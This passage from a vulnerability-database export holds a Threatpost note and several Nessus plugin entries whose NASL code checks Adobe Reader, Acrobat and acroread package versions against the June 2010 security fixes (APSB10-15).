advisory](<Deleting,%20renaming,%20or%20removing%20access%20to%20the%20authplay.dll%20file%20that%20ships%20with%20Adobe%20Reader%209.x%20and%20Acrobat%209.x%20mitigates%20the%20threat%20for%20those%20products,%20but%20users%20will%20experience%20a%20non-exploitable%20crash%20or%20error%20message%20when%20opening%20a%20PDF%20file%20that%20contains%20SWF%20content.%20%20The%20authplay.dll%20that%20ships%20with%20Adobe%20Reader%209.x%20and%20Acrobat%209.x%20for%20Windows%20is%20typically%20located%20at%20C:%5CProgram%20Files%5CAdobe%5CReader%209.0%5CReader%5Cauthplay.dll%20for%20Adobe%20Reader%20or%20C:%5CProgram%20Files%5CAdobe%5CAcrobat%209.0%5CAcrobat%5Cauthplay.dll%20for%20Acrobat.>). \n", "modified": "2018-08-15T12:37:29", "published": "2010-06-08T10:56:42", "id": "THREATPOST:40512FCC86A3D41C18AC58E1B95FF55E", "href": "https://threatpost.com/adobe-release-flash-patch-june-10-060810/74071/", "type": "threatpost", "title": "Adobe to Release Flash Patch June 10", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T01:14:25", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2212)", "edition": 25, "published": "2010-06-30T00:00:00", "title": "Adobe Reader < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB10-15.NASL", "href": "https://www.tenable.com/plugins/nessus/47165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47165);\n script_version(\"1.54\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40034\");\n\n script_name(english:\"Adobe Reader < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_cve_id(\n \"CVE-2010-1240\",\n \"CVE-2010-1285\",\n \"CVE-2010-1295\",\n \"CVE-2010-1297\",\n \"CVE-2010-2168\",\n \"CVE-2010-2201\",\n \"CVE-2010-2202\",\n \"CVE-2010-2204\",\n \"CVE-2010-2205\",\n \"CVE-2010-2206\",\n \"CVE-2010-2207\",\n \"CVE-2010-2208\",\n \"CVE-2010-2209\",\n \"CVE-2010-2210\",\n \"CVE-2010-2211\",\n \"CVE-2010-2212\"\n );\n script_bugtraq_id(\n 39109,\n 40586,\n 41230,\n 41231,\n 41232,\n 41234,\n 41236,\n 41237,\n 41238,\n 41239,\n 41240,\n 41241,\n 41242,\n 41243,\n 41244,\n 41245\n );\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2212)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 9.3.3 / 8.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\n#\n\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB list is missing.');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 3) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 3)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 9.3.3 / 8.2.3\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\n\nif (info2) \n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:02", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2212)", "edition": 25, "published": "2010-06-30T00:00:00", "title": "Adobe Acrobat < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-15.NASL", "href": "https://www.tenable.com/plugins/nessus/47164", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47164);\n script_version(\"1.51\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40034\");\n\n script_name(english:\"Adobe Acrobat < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_cve_id(\n \"CVE-2010-1240\",\n \"CVE-2010-1285\",\n \"CVE-2010-1295\",\n \"CVE-2010-1297\",\n \"CVE-2010-2168\",\n \"CVE-2010-2201\",\n \"CVE-2010-2202\",\n \"CVE-2010-2204\",\n \"CVE-2010-2205\",\n \"CVE-2010-2206\",\n \"CVE-2010-2207\",\n \"CVE-2010-2208\",\n \"CVE-2010-2209\",\n \"CVE-2010-2210\",\n \"CVE-2010-2211\",\n \"CVE-2010-2212\"\n );\n script_bugtraq_id(\n 39109,\n 40586,\n 41230,\n 41231,\n 41232,\n 41234,\n 41236,\n 41237,\n 41238,\n 41239,\n 41240,\n 41241,\n 41242,\n 41243,\n 41244,\n 41245\n );\n \n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2212)\");\n\n script_set_attribute(attribute:'see_also',value:'http://www.adobe.com/support/security/bulletins/apsb10-15.html');\n script_set_attribute(attribute:'solution',value:'Upgrade to Adobe Acrobat 9.3.3 / 8.2.3 or later.');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\n\ninclude('global_settings.inc');\n\nversion = get_kb_item('SMB/Acrobat/Version');\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 3) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 3)\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Product : Adobe Acrobat'+\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 9.3.3 / 8.2.3\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:00", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).", "edition": 24, "published": "2010-07-09T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-09T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_0_ACROREAD-100708.NASL", "href": "https://www.tenable.com/plugins/nessus/47690", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47690);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)\");\n script_summary(english:\"Check for the acroread-2664 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-07/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-cmaps-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-ja-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-ko-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-zh_CN-9.3.3-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-fonts-zh_TW-9.3.3-2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:59", "description": "Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise\nLinux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. A specially crafted PDF\nfile could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-1240, CVE-2010-1285, CVE-2010-1295, CVE-2010-1297,\nCVE-2010-2168, CVE-2010-2201, CVE-2010-2202, CVE-2010-2203,\nCVE-2010-2204, CVE-2010-2205, CVE-2010-2206, CVE-2010-2207,\nCVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.3.3, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.", "edition": 28, "published": "2010-07-28T00:00:00", "title": "RHEL 4 / 5 : acroread (RHSA-2010:0503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-07-28T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:acroread-plugin", "p-cpe:/a:redhat:enterprise_linux:acroread"], "id": "REDHAT-RHSA-2010-0503.NASL", "href": "https://www.tenable.com/plugins/nessus/47869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0503. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47869);\n script_version(\"1.52\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_bugtraq_id(40586, 41230, 41231, 41232, 41234, 41235, 41236, 41237, 41238, 41239, 41240, 41241, 41242, 41243, 41244, 41245);\n script_xref(name:\"RHSA\", value:\"2010:0503\");\n\n script_name(english:\"RHEL 4 / 5 : acroread (RHSA-2010:0503)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise\nLinux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. A specially crafted PDF\nfile could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2010-1240, CVE-2010-1285, CVE-2010-1295, CVE-2010-1297,\nCVE-2010-2168, CVE-2010-2201, CVE-2010-2202, CVE-2010-2203,\nCVE-2010-2204, CVE-2010-2205, CVE-2010-2206, 